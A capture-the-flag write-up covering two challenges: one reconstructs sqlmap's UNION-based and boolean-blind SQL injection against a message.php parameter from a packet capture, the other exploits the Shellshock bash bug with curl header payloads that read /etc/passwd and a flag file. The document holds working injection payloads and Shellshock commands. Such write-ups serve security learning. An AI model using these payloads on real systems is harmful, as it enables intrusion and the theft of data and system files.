SQLMAP

The challenge is simple: all you get is a packet capture.

Capture download: sqlmap

From the capture, http://10.0.0.201/message.php?id= has an injection point, and sqlmap was used against it to dump the database. I had analysed sqlmap's dumping process not long before, so I'm fairly familiar with it.

Straight to the key points.

Injection succeeds (the injected condition is true):

http://10.0.0.201/message.php?id=1 AND 1922=1922

Response:

Message #1 AND 1922=1922: The quick brown fox jumps over the lazy dog

Injection fails (the injected condition is false):

http://10.0.0.201/message.php?id=1 AND 5345=8796

Response:

Message #1 AND 5345=8796:

So whether the injected SQL condition evaluated to true can be read off from whether anything appears after the colon: the page echoes the raw id parameter, then prints the message text only when the query returned a row.

One thing worth noting: if you use Wireshark's Follow TCP Stream you will not see the server's response in plaintext, because the body is gzip-encoded. Double-click the response frame instead; the "Line-based text data" field shows the decoded plaintext.

PS. There is of course a shortcut, such as running the capture through an audit system and getting the result directly. I don't tell most people that :D

With the above basics, the rest of the capture is easy to analyse.

Getting the current database name:

http://10.0.0.201/message.php?id=-2060 UNION ALL SELECT NULL,CONCAT(0x7173636371,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x716f757371)#

Response:

Message #-2060 UNION ALL SELECT NULL,CONCAT(0x7173636371,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x716f757371)#: qsccqisgqousq

0x7173636371 = qsccq and 0x716f757371 = qousq; these are the marker strings sqlmap wraps around the extracted value so it can locate it in the page. The same applies to all the queries below. The text between the markers gives the current database: isg.

Next the table names and column names are enumerated (0x697367 is "isg"):

Message #-7713 UNION ALL SELECT NULL,CONCAT(0x7173636371,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716f757371) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x697367)#: qsccq2qousq

There are two tables.

Message #-3380 UNION ALL SELECT NULL,(SELECT CONCAT(0x7173636371,IFNULL(CAST(table_name AS CHAR),0x20),0x716f757371) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x697367) LIMIT 0,1)#: qsccqflagsqousq

A table named flags exists.

Message #-8854 UNION ALL SELECT NULL,(SELECT CONCAT(0x7173636371,IFNULL(CAST(table_name AS CHAR),0x20),0x716f757371) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x697367) LIMIT 1,1)#: qsccqmessagesqousq

A table named messages exists.

Message #-8145 UNION ALL SELECT NULL,CONCAT(0x7173636371,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x716f757371) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d65737361676573 AND table_schema=0x697367#: qsccq2qousq

The messages table has two columns (this is COUNT(*) over INFORMATION_SCHEMA.COLUMNS, so it counts columns, not rows; 0x6d65737361676573 is "messages").

Message #-2023 UNION ALL SELECT NULL,(SELECT CONCAT(0x7173636371,IFNULL(CAST(column_name AS CHAR),0x20),0x70767673756c,IFNULL(CAST(column_type AS CHAR),0x20),0x716f757371) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d65737361676573 AND table_schema=0x697367 LIMIT 1,1)#: qsccqvaluepvvsultinytextqousq

The second column of messages (LIMIT 1,1) is named value and has type tinytext; 0x70767673756c ("pvvsul") is the separator sqlmap puts between the two fields of one row.

Message #-8873 UNION ALL SELECT NULL,(SELECT CONCAT(0x7173636371,IFNULL(CAST(`value` AS CHAR),0x20),0x716f757371) FROM isg.messages ORDER BY `value` LIMIT 0,1)#: qsccqThe quick brown fox jumps over the lazy dogqousq

The content of isg.messages is: The quick brown fox jumps over the lazy dog

Message #-2064 UNION ALL SELECT NULL,(SELECT CONCAT(0x7173636371,IFNULL(CAST(column_name AS CHAR),0x20),0x70767673756c,IFNULL(CAST(column_type AS CHAR),0x20),0x716f757371) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x666c616773 AND table_schema=0x697367 LIMIT 1,1)#: qsccqvaluepvvsultinytextqousq

The flags table (0x666c616773) likewise has a column named value of type tinytext.

Message #-3413 UNION ALL SELECT NULL,CONCAT(0x7173636371,IFNULL(CAST(COUNT(`value`) AS CHAR),0x20),0x716f757371) FROM isg.flags#: qsccq1qousq

flags has one row.

http://10.0.0.201/message.php?id=-3324 UNION ALL SELECT NULL,(SELECT CONCAT(0x7173636371,IFNULL(CAST(`value` AS CHAR),0x20),0x716f757371) FROM isg.flags ORDER BY `value` LIMIT 0,1)#

Querying the flags table directly with a UNION returned nothing (no text after the colon), so sqlmap fell back to boolean-based blind inference, guessing the value one character at a time.

MID() extracts a character: MID(text,1,1) takes one character starting at position 1.

ORD() converts that character to its ASCII code.

The character is then found by comparing its ASCII code against thresholds. Below is the guessing of the first character: when the response carries "The quick brown fox jumps over the lazy dog", the comparison was true.

Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>64: The quick brown fox jumps over the lazy dog
Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>96:
Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>80:
Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>72: The quick brown fox jumps over the lazy dog
Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>76:
Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>74:
Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>73:

The first character's ASCII code is therefore greater than 72 and not greater than 73, so it is 73, the uppercase letter I. Each probe halves the remaining interval, so a character costs about seven requests.

Repeating this for every position gives the ASCII codes:

73,83,71,123,66,76,105,110,100,95,83,81,108,95,73,110,74,69,99,84,105,48,78,95,68,101,84,69,99,84,69,100,125

which decode to: ISG{BLind_SQl_InJEcTi0N_DeTEcTEd}

Up-to-Date

[screenshot: ISG-2014-UP-TO-DATE]

This challenge was released quite late and was worth only 100 points, so it was probably put together at the last minute. The site is just a front page and nothing else.

[screenshot: ISG-2014-UP-TO-DATE2]

Unlike the other web challenges, the front page file could not be found by guessing: it is none of index.php, index.htm, index.html, default.php, default.htm or default.html.

Either the challenge deliberately hides the index file, or the extension is something else. Perhaps a different extension, maybe CGI? Combined with the challenge hint, "the server is updated weekly to keep flag.txt safe", this brings to mind the bash vulnerability (Shellshock) disclosed a few days earlier. See: http://coolshell.cn/articles/11973.html

Sure enough, that's the bug! This must be the fastest any CTF has turned the bash vulnerability into a challenge :D

Read the server's passwd file with the following command. The header value is a bash function definition followed by the injected command; the -I makes curl send a HEAD request and print the response headers, which is where the output of the injected echo shows up:

curl -H 'b:() { :; };a=` /bin/cat /etc/passwd `;echo "a=$a";' http://202.112.26.125:8888/ -I

[screenshot: ISG-2014-bash]

Listing directories with ls in the same way eventually turned up flag.txt under /var/www.

So:

curl -H 'b:() { :; };a=` /bin/cat /var/www/flag.txt`;echo "a:$a";' http://202.112.26.125:8888/ -I